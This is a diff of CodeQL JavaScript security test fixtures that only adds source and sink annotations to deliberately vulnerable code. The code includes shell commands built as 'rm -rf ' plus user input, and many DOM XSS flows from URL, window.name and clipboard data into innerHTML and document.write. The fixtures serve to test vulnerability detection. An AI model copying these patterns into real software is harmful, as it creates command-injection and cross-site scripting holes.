a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js index 67890f50fe82..853e144a0d62 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js @@ -1,5 +1,5 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // $ Alert - the "files" directory points to this file. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - the "files" directory points to this file. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts index 8a79d2d66a66..f28c157a5ead 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts @@ -1,5 +1,5 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged. }; diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js index 820349c5c62f..505f4e7af78a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js @@ -3,6 +3,6 @@ const dispatch = { POST: require("./subsub"), }; -module.exports.foo = function (name, type) { +module.exports.foo = function (name, type) { // $ Source dispatch[type](name); }; diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js index bc9e51562033..b8da58006c7c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js @@ -1,5 +1,5 @@ const cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged. + cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged. }; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js index 8d4a8cac6d0a..5c933dceff32 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js @@ -1,13 +1,13 @@ -this.addEventListener('message', function(event) { +this.addEventListener('message', function(event) { // $ Source document.write(event.data); // $ Alert }) -this.addEventListener('message', function({data}) { +this.addEventListener('message', function({data}) { // $ Source document.write(data); // $ Alert }) function test() { - function foo(x, event, y) { + function foo(x, event, y) { // $ Source document.write(x.data); document.write(event.data); // $ Alert document.write(y.data); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js index 1b186b7db6a4..14d645d32c4f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js @@ -10,6 +10,6 @@ angular.module('myApp', []) } }); -addEventListener('message', (ev) => { +addEventListener('message', (ev) => { // $ Source Cookie.set("unsafe", ev.data); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js index 8cda29a4e952..0d9f2d9fad21 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js @@ -7,7 +7,7 @@ function main() { document.body.innerHTML = `Hello`; // $ Alert document.body.innerHTML = `Hello`; // $ Alert document.body.innerHTML = `Hello`; // $ Alert - let unsafeStyle = classNames.bind({foo: window.name}); + let unsafeStyle = classNames.bind({foo: window.name}); // $ Source document.body.innerHTML = `Hello`; // $ Alert let safeStyle = classNames.bind({}); document.body.innerHTML = `Hello`; // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts index abc11b06ea87..79970a0e1b77 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts @@ -5,7 +5,7 @@ function paste(e) { if (!clipboardData) return; const text = clipboardData.getData('text/plain'); - const html = clipboardData.getData('text/html'); + const html = clipboardData.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); @@ -40,7 +40,7 @@ $("#foo").bind('paste', (e) => { if (!clipboardData) return; const text = clipboardData.getData('text/plain'); - const html = clipboardData.getData('text/html'); + const html = clipboardData.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); @@ -68,7 +68,7 @@ async function getClipboardData(e: ClipboardEvent): Promise } if (e.clipboardData.types.includes('text/html')) { - const droppedHtml = e.clipboardData.getData('text/html'); + const droppedHtml = e.clipboardData.getData('text/html'); // $ Source const container = document.createElement('html'); container.innerHTML = droppedHtml; // $ Alert const imgs = container.getElementsByTagName('img'); @@ -95,7 +95,7 @@ async function getClipboardData(e: ClipboardEvent): Promise const { data, inputType, isComposing, dataTransfer } = e; if (!dataTransfer) return; - const html = dataTransfer.getData('text/html'); + const html = dataTransfer.getData('text/html'); // $ Source $("#id").html(html); // $ Alert }); })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js index c84f169995cb..df6fd9f439f0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js @@ -1,7 +1,7 @@ const d3 = require('d3'); function getTaint() { - return window.name; + return window.name; // $ Source } function doSomething() { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js index 97363f790da1..20e71516a9f7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js @@ -6,7 +6,7 @@ import dateformat from 'dateformat'; function main() { let time = new Date(); - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source document.body.innerHTML = `Time is ${dateFns.format(time, taint)}`; // $ Alert document.body.innerHTML = `Time is ${dateFnsEsm.format(time, taint)}`; // $ Alert @@ -27,7 +27,7 @@ import MomentAdapter from "@date-io/moment"; import DayJSAdapter from "@date-io/dayjs" function dateio() { - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source const dateFns = new DateFnsAdapter(); const luxon = new LuxonAdapter(); @@ -43,7 +43,7 @@ function dateio() { import { DateTime } from "luxon"; function luxon() { - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source document.body.innerHTML = `Time is ${DateTime.now().plus({years: 1}).toFormat(taint)}`; // $ Alert document.body.innerHTML = `Time is ${new DateTime().setLocale('fr').toFormat(taint)}`; // $ Alert @@ -51,7 +51,7 @@ function luxon() { } function dateio2() { - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source const moment = new MomentAdapter(); document.body.innerHTML = `Time is ${moment.addDays(moment.date("2020-06-21"), 1).format(taint)}`; // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts index 2e3c92f36758..8371c4c49b91 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts @@ -5,7 +5,7 @@ function drop(e) { if (!dataTransfer) return; const text = dataTransfer.getData('text/plain'); - const html = dataTransfer.getData('text/html'); + const html = dataTransfer.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); @@ -40,7 +40,7 @@ $("#foo").bind('drop', (e) => { if (!dataTransfer) return; const text = dataTransfer.getData('text/plain'); - const html = dataTransfer.getData('text/html'); + const html = dataTransfer.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); @@ -68,7 +68,7 @@ async function getDropData(e: DragEvent): Promise> { } if (e.dataTransfer.types.includes('text/html')) { - const droppedHtml = e.dataTransfer.getData('text/html'); + const droppedHtml = e.dataTransfer.getData('text/html'); // $ Source const container = document.createElement('html'); container.innerHTML = droppedHtml; // $ Alert const imgs = container.getElementsByTagName('img'); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js index f81f545809fa..d025ace184c8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js @@ -1,5 +1,5 @@ function test() { - var tainted = document.location.search + var tainted = document.location.search // $ Source $(tainted); // OK - location.search starts with '?' $("body", tainted); @@ -15,7 +15,7 @@ function test() { elm.innerHTML = decodeURIComponent(window.location.search); // $ Alert elm.innerHTML = decodeURIComponent(window.location.toString()); // $ Alert - let hash = window.location.hash; + let hash = window.location.hash; // $ Source $(hash); // OK - start with '#' $(hash.substring(1)); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx index f9958ea20999..ae373dd4ea96 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx @@ -2,7 +2,7 @@ var express = require("express"); var app = express(); app.get("/some/path", function (req, res) { - const locale = req.param("locale"); + const locale = req.param("locale"); // $ Source const breadcrumbList = [ { "@type": "ListItem", diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js index 74c96fdae902..86b4c3e8d3cb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js @@ -4,7 +4,7 @@ import jwt from "jsonwebtoken"; import { JSDOM } from "jsdom"; app.get('/some/path', function (req, res) { - var taint = req.param("wobble"); + var taint = req.param("wobble"); // $ Source jwt.verify(taint, 'my-secret-key', function (err, decoded) { new JSDOM(decoded.foo, { runScripts: "dangerously" }); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js index dcec3e388777..73088a45b5ef 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js @@ -1,5 +1,5 @@ function test() { - var target = document.location.search + var target = document.location.search // $ Source $('myId').html(sanitize ? DOMPurify.sanitize(target) : target); @@ -23,7 +23,7 @@ function test() { } function badSanitizer() { - var target = document.location.search + var target = document.location.search // $ Source function sanitizeBad(x) { return x; // No sanitization; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx index b60ca27e0e47..69f66f07aa44 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx @@ -2,7 +2,7 @@ import { useRouter } from 'next/router' export default function Post(params) { const router = useRouter() - const { id } = router.query + const { id } = router.query // $ Source return ( <> @@ -22,8 +22,8 @@ export default function Post(params) { export async function getServerSideProps(context) { return { props: { - id: context.params.id || "", - q: context.query?.foobar || "", + id: context.params.id || "", // $ Source + q: context.query?.foobar || "", // $ Source } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js index 2e403f76ddae..432c9910a2d7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js @@ -4,7 +4,7 @@ import { WebView } from 'react-native'; var app = express(); app.get('/some/path', function(req, res) { - let tainted = req.param("code"); + let tainted = req.param("code"); // $ Source ; // $ Alert ; // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js index 7bf77b18be10..2dbc2feb38fa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js @@ -1,19 +1,19 @@ import { useState } from 'react'; function initialState() { - let [state, setState] = useState(window.name); + let [state, setState] = useState(window.name); // $ Source return
; // $ Alert } function setStateValue() { let [state, setState] = useState('foo'); - setState(window.name); + setState(window.name); // $ Source return
; // $ Alert } function setStateValueLazy() { let [state, setState] = useState('foo'); - setState(() => window.name); + setState(() => window.name); // $ Source return
; // $ Alert } @@ -22,7 +22,7 @@ function setStateValueLazy() { setState(prev => { document.body.innerHTML = prev; // $ Alert }) - setState(() => window.name); + setState(() => window.name); // $ Source } function setStateValueSafe() { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js index 3ece85044bb3..52ad850e0185 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js @@ -13,7 +13,7 @@ function escapeAttr(s) { } function test() { - var tainted = window.name; + var tainted = window.name; // $ Source var elt = document.createElement(); elt.innerHTML = "" + escapeHtml(tainted) + ""; elt.innerHTML = "
" + escapeAttr(tainted) + "
"; // $ MISSING: Alert - not flagged - diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js index 6ee44babf8bf..aadec44a9dfb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js @@ -1,6 +1,6 @@ (function() { - sessionStorage.setItem('session', document.location.search); - localStorage.setItem('local', document.location.search); + sessionStorage.setItem('session', document.location.search); // $ Source + localStorage.setItem('local', document.location.search); // $ Source $('myId').html(sessionStorage.getItem('session')); // $ Alert $('myId').html(localStorage.getItem('session')); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js index a823a6ce004f..7b0e5c4be3a0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js @@ -8,6 +8,6 @@ function foo(x, y, z) { } function bar() { - const url = window.location.href; + const url = window.location.href; // $ Source foo('safe', url, 'safe'); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx index e1d26b45802d..0b181f836c46 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx @@ -3,7 +3,7 @@ import ReactDOM from 'react-dom'; import ReactTooltip from 'react-tooltip'; function tooltips() { - const source = window.name; + const source = window.name; // $ Source return @@ -19,6 +19,6 @@ function MyElement(props) { } function useMyElement() { - const source = window.name; + const source = window.name; // $ Source return source} />; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js index d57844a89f28..11adc4399376 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js @@ -3,7 +3,7 @@ "own goal": "backpass", "fumble": "feint" }; - var target = document.location.search + var target = document.location.search // $ Source var searchParams = new URLSearchParams(target.substring(1)); $('original-term').html(searchParams.get('term')); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js index 34eae2dc6a5b..247fbe3315fb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js @@ -1,7 +1,7 @@ import * as lib from './trusted-types-lib'; const policy1 = trustedTypes.createPolicy('x', { createHTML: x => x }); // $ Alert -policy1.createHTML(window.name); +policy1.createHTML(window.name); // $ Source const policy2 = trustedTypes.createPolicy('x', { createHTML: x => 'safe' }); policy2.createHTML(window.name); @@ -10,4 +10,4 @@ const policy3 = trustedTypes.createPolicy('x', { createHTML: x => x }); policy3.createHTML('safe'); const policy4 = trustedTypes.createPolicy('x', { createHTML: lib.createHtml }); -policy4.createHTML(window.name); +policy4.createHTML(window.name); // $ Source diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js index 6fb538bd1c1b..7709e095601f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js @@ -1,5 +1,5 @@ function test() { - var target = document.location.search + var target = document.location.search // $ Source $('myId').html(target) // $ Alert @@ -11,7 +11,7 @@ function test() { $('
'); $('
'); - let params = (new URL(document.location)).searchParams; + let params = (new URL(document.location)).searchParams; // $ Source $('name').html(params.get('name')); // $ Alert var searchParams = new URLSearchParams(target.substring(1)); @@ -21,10 +21,10 @@ function test() { function foo(target) { $('myId').html(target); // $ Alert } -foo(document.location.search); +foo(document.location.search); // $ Source function bar() { - return document.location.search; + return document.location.search; // $ Source } $('myId').html(bar()); // $ Alert @@ -50,12 +50,12 @@ $('myId').html(wrap(chop(bar()))); // $ Alert function dangerouslySetInnerHtml(s) { $('myId').html(s); // $ Alert } -dangerouslySetInnerHtml(document.location.search); -dangerouslySetInnerHtml(document.location.search); +dangerouslySetInnerHtml(document.location.search); // $ Source +dangerouslySetInnerHtml(document.location.search); // $ Source $('myId').html(bar()); // $ Alert -[,document.location.search].forEach(function(x) { +[,document.location.search].forEach(function(x) { // $ Source if (x) $('myId').html(x); // $ Alert }); @@ -90,7 +90,7 @@ angular.module('myApp', []) }) function tst() { - var v = document.location.search.substr(1); + var v = document.location.search.substr(1); // $ Source document.write(v); // $ Alert @@ -129,7 +129,7 @@ function tst() { function angularJSServices() { angular.module('myApp', []) .factory("xssSource_to_service", ["xssSinkService1", function(xssSinkService1) { - xssSinkService1(window.location.search); + xssSinkService1(window.location.search); // $ Source }]) .factory("xssSinkService1", function(){ return function(v){ $("
").html(v); } // $ Alert @@ -139,7 +139,7 @@ function angularJSServices() { $("
").html(xssSourceService()); // $ Alert }]) .factory("xssSourceService", function(){ - return function() { return window.location.search }; + return function() { return window.location.search }; // $ Source }) .factory("innocentSource_to_service", ["xssSinkService2", function(xssSinkService2) { @@ -158,14 +158,14 @@ function angularJSServices() { } function testDOMParser() { - var target = document.location.search + var target = document.location.search // $ Source var parser = new DOMParser(); parser.parseFromString(target, "application/xml"); // $ Alert } function references() { - var tainted = document.location.search; + var tainted = document.location.search; // $ Source document.body.innerHTML = tainted; // $ Alert @@ -178,7 +178,7 @@ function references() { } function react(){ - var tainted = document.location.search; + var tainted = document.location.search; // $ Source React.createElement("div", {dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert React.createFactory("div")({dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert @@ -266,7 +266,7 @@ function jqueryLocation() { function testCreateContextualFragment() { - var tainted = window.name; + var tainted = window.name; // $ Source var range = document.createRange(); range.selectNode(document.getElementsByTagName("div").item(0)); var documentFragment = range.createContextualFragment(tainted); // $ Alert @@ -282,14 +282,14 @@ function flowThroughPropertyNames() { function basicExceptions() { try { - throw location; + throw location; // $ Source } catch(e) { $("body").append(e); // $ Alert } try { try { - throw location + throw location // $ Source } finally {} } catch(e) { $("body").append(e); // $ Alert @@ -308,7 +308,7 @@ function test2() { } function getTaintedUrl() { - return new URL(document.location); + return new URL(document.location); // $ Source } function URLPseudoProperties() { @@ -322,21 +322,21 @@ function URLPseudoProperties() { function hash() { function getUrl() { - return new URL(document.location); + return new URL(document.location); // $ Source } $(getUrl().hash.substring(1)); // $ Alert } function growl() { - var target = document.location.search + var target = document.location.search // $ Source $.jGrowl(target); // $ Alert } function thisNodes() { var pluginName = "myFancyJQueryPlugin"; var myPlugin = function () { - var target = document.location.search + var target = document.location.search // $ Source this.html(target); // $ Alert - this is a jQuery object this.innerHTML = target // OK - this is a jQuery object @@ -352,7 +352,7 @@ function thisNodes() { } function test() { - var target = document.location.search + var target = document.location.search // $ Source $('myId').html(target) // $ Alert @@ -361,7 +361,7 @@ function test() { } function test() { - var target = document.location.search + var target = document.location.search // $ Source $('myId').html(target); // $ Alert @@ -371,7 +371,7 @@ function test() { target.taint2 = 2; $('myId').html(target.taint2); - target.taint3 = document.location.search; + target.taint3 = document.location.search; // $ Source $('myId').html(target.taint3); // $ Alert target.sub.taint4 = 2 @@ -396,10 +396,10 @@ function test() { } function hash2() { - var payload = window.location.hash.substr(1); + var payload = window.location.hash.substr(1); // $ Source document.write(payload); // $ Alert - let match = window.location.hash.match(/hello (\w+)/); + let match = window.location.hash.match(/hello (\w+)/); // $ Source if (match) { document.write(match[1]); // $ Alert } @@ -408,7 +408,7 @@ function hash2() { } function nonGlobalSanitizer() { - var target = document.location.search + var target = document.location.search // $ Source $("#foo").html(target.replace(/[\s\S]*<\/metadata>/, '')); // $ Alert @@ -416,7 +416,7 @@ function nonGlobalSanitizer() { } function mootools(){ - var source = document.location.search; + var source = document.location.search; // $ Source new Element("div"); new Element("div", {text: source}); @@ -433,14 +433,14 @@ const Convert = require('ansi-to-html'); const ansiToHtml = new Convert(); function ansiToHTML() { - var source = document.location.search; + var source = document.location.search; // $ Source $("#foo").html(source); // $ Alert $("#foo").html(ansiToHtml.toHtml(source)); // $ Alert } function domMethods() { - var source = document.location.search; + var source = document.location.search; // $ Source let table = document.getElementById('mytable'); table.innerHTML = source; // $ Alert @@ -451,7 +451,7 @@ function domMethods() { } function urlStuff() { - var url = document.location.search.substr(1); + var url = document.location.search.substr(1); // $ Source $("", {href: url}).appendTo("body"); // $ Alert $("#foo").attr("href", url); // $ Alert @@ -488,7 +488,7 @@ function Foo() { } function nonGlobalSanitizer() { - var target = document.location.search + var target = document.location.search // $ Source $("#foo").html(target.replace(new RegExp("<|>"), '')); // $ Alert $("#foo").html(target.replace(new RegExp("<|>", unknownFlags()), '')); // OK - most likely good. We don't know what the flags are. $("#foo").html(target.replace(new RegExp("<|>", "g"), '')); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js index 16932da72c05..eb1074a5a62f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js @@ -1,5 +1,5 @@ var foo = document.getElementById("foo"); -var data = JSON.parse(decodeURIComponent(window.location.search.substr(1))); +var data = JSON.parse(decodeURIComponent(window.location.search.substr(1))); // $ Source foo.setAttribute("src", data.src); // $ Alert foo.setAttribute("HREF", data.p); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js index a1302d196a7f..a3694f3cf79e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js @@ -17,7 +17,7 @@ { name: 'dashboards', source: function (query, cb) { - var target = document.location.search + var target = document.location.search // $ Source cb(target); }, templates: { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js index 957fe1ba0497..866636f07c18 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js @@ -1,5 +1,5 @@ function test() { - let tainted = document.location.search; + let tainted = document.location.search; // $ Source $("
" + tainted + "
"); // $ Alert $(`
${tainted}
`); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js index f52cb62735fb..5d2b25bed092 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js @@ -1,5 +1,5 @@ function test(elt) { - var tainted = document.location.search.substring(1); + var tainted = document.location.search.substring(1); // $ Source WinJS.Utilities.setInnerHTMLUnsafe(elt, tainted); // $ Alert WinJS.Utilities.setOuterHTMLUnsafe(elt, tainted); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js index f8a3d5c09486..c330177d56a3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js @@ -1,5 +1,5 @@ (function () { - var foo = document.location; + var foo = document.location; // $ Source function inner(x) { unknown(x); @@ -114,7 +114,7 @@ var app = express(); app.get('/user/:id', function (req, res) { try { - unknown(req.params.id); + unknown(req.params.id); // $ Source } catch (e) { res.send("Exception: " + e); // $ Alert } @@ -122,7 +122,7 @@ app.get('/user/:id', function (req, res) { (function () { - sessionStorage.setItem('exceptionSession', document.location.search); + sessionStorage.setItem('exceptionSession', document.location.search); // $ Source try { unknown(sessionStorage.getItem('exceptionSession')); @@ -133,7 +133,7 @@ app.get('/user/:id', function (req, res) { app.get('/user/:id', function (req, res) { - unknown(req.params.id, (error, res) => { + unknown(req.params.id, (error, res) => { // $ Source if (error) { $('myId').html(error); // $ Alert return; @@ -143,7 +143,7 @@ app.get('/user/:id', function (req, res) { }); (function () { - var foo = document.location.search; + var foo = document.location.search; // $ Source new Promise(resolve => unknown(foo, resolve)).catch((e) => { $('myId').html(e); // $ Alert @@ -177,7 +177,7 @@ app.get('/user/:id', function (req, res) { })(); app.get('/user/:id', function (req, res) { - unknown(req.params.id, (error, res) => { + unknown(req.params.id, (error, res) => { // $ Source if (error) { $('myId').html(error); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js index 667bbe822140..c6be2e55e87e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js @@ -60,7 +60,7 @@ app.get('/user/:id', function (req, res) { .use(doc, { title: '👋🌍' }) .use(format) .use(html) - .process(req.body, function (err, file) { + .process(req.body, function (err, file) { // $ Source res.send(file); // $ Alert }); @@ -70,7 +70,7 @@ app.get('/user/:id', function (req, res) { res.send(unified().use(markdown).processSync(req.body).toString); // $ Alert - remark().process(req.body, (e, f) => { + remark().process(req.body, (e, f) => { // $ Source res.send(f); // $ Alert }) }); @@ -110,9 +110,9 @@ hapi.route({ }}); 